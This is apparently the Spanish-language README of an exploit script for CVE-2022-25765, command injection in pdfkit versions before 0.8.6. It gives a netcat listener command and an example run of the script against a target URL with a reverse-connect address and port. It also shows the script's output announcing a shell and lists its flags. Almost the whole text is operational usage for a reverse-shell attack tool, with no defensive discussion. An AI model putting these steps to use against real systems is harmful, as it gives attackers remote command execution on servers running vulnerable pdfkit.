
Exploit para inyección de comandos en pdfkit < 0.8.6
Exploit para CVE-2022-25765 inyección de comandos en pdfkit < 0.8.6
Ver más detalles sobre la vulnerabilidad here
Ejecuta netcat en tu host:
$ nc -lvnp 1337
Ejecuta el exploit (ejemplo):
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
Flags:
-t, --target Dirección del objetivo en formato http
-a, --addr Dirección para la conexión inversa
-p, --port Puerto para la conexión inversa, por defecto 9001